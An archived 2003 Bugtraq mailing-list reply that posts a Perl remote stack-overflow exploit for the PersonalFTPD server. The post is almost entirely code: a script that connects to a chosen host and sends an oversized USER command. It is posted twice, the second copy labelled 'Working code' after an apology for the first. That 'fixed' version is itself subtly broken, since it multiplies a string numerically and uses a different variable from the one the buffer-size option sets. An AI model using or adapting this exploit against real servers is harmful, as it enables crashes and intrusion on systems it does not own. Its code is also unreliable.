Bugtraq mailing list archives
Re: Remote Stack Overflow exploit for Personal FTPD
From: subj <r2subj3ct () dwclan org>
Date: 8 May 2003 17:25:53 -0000
In-Reply-To: <20030508081123.13047.qmail () www securityfocus com>
Received: (qmail 20952 invoked from network); 8 May 2003 14:15:36 -0000 Received: from outgoing2.securityfocus.com (205.206.231.26) by mail.securityfocus.com with SMTP; 8 May 2003 14:15:36 -0000 Received: from lists.securityfocus.com (lists.securityfocus.com
[205.206.231.19])
by outgoing2.securityfocus.com (Postfix) with QMQP id ED2648F2D9; Thu, 8 May 2003 08:19:59 -0600 (MDT) Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq () securityfocus com> List-Help: <mailto:bugtraq-help () securityfocus com> List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com> List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com> Delivered-To: mailing list bugtraq () securityfocus com Delivered-To: moderator for bugtraq () securityfocus com Received: (qmail 22205 invoked from network); 8 May 2003 07:49:14 -0000 Date: 8 May 2003 08:11:23 -0000 Message-ID: <20030508081123.13047.qmail () www securityfocus com> Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) From: subj <r2subj3ct () dwclan org> To: bugtraq () securityfocus com Subject: Remote Stack Overflow exploit for Personal FTPD #!/usr/bin/perl use IO::Socket; ########################################################## # # # Remote Stack Overflow sploit for PersonalFTPD # # If wanna talk with me find me on irc # # irc.irochka.net #dwc, #global, #phreack # # ###################################################### # # thanx to kabuto, drG4njubas, fnq # # gr33tz to dhg, gipshack, rsteam, blacktigerz # # D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0 # # ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z # # ###################################################### # # Vulnerability links: # # http://security.nnov.ru/search/document.asp?docid=4309 # # http://www.securityfocus.com/archive/1/316958 # # # ########################################################## $data = "A"; print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n"; print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n"; print "[..] by subj | dwc :: big 10x to Kabuto [..]\n"; print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n"; print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n"; $count_param=@ARGV; $n="0"; if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer size\n\n"; exit; } while ($n<$count_param) { if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];} if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];} if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];} $n++; } &connect; sub connect { $sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort
=> "$port",
Proto => "tcp") || die "Can\'t connect to $server port $port\n"; print $sock "USER $buffer\n"; print "Buffer has beens sended..."; } close($sock); exit;
-------------------------------------------------------------------------- I bring the apologies, has laid out not working version, simply was mistaken a file, before $sock it is necessary to add $buffer. = $data * $bsize; Working code #!/usr/bin/perl use IO::Socket; ########################################################## # # # Remote Stack Overflow sploit for PersonalFTPD # # If wanna talk with me find me on irc # # irc.irochka.net #dwc, #global, #phreack # # ###################################################### # # thanx to kabuto, drG4njubas, fnq # # gr33tz to dhg, gipshack, rsteam, blacktigerz # # D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0 # # ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z # # ###################################################### # # Vulnerability links: # # http://security.nnov.ru/search/document.asp?docid=4309 # # http://www.securityfocus.com/archive/1/316958 # # # ########################################################## $data = "A"; print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n"; print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n"; print "[..] by subj | dwc :: big 10x to Kabuto [..]\n"; print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n"; print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n"; $count_param=@ARGV; $n="0"; if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer size\n\n"; exit; } while ($n<$count_param) { if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];} if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];} if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];} $n++; } &connect; sub connect { $buffer.= $data * $bsize; $sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port", Proto => "tcp") || die "Can\'t connect to $server port $port\n"; print $sock "USER $buffer\n"; print "Buffer has beens sended..."; } close($sock); exit;
Current thread:
- Remote Stack Overflow exploit for Personal FTPD subj (May 08)
- <Possible follow-ups>
- Re: Remote Stack Overflow exploit for Personal FTPD subj (May 08)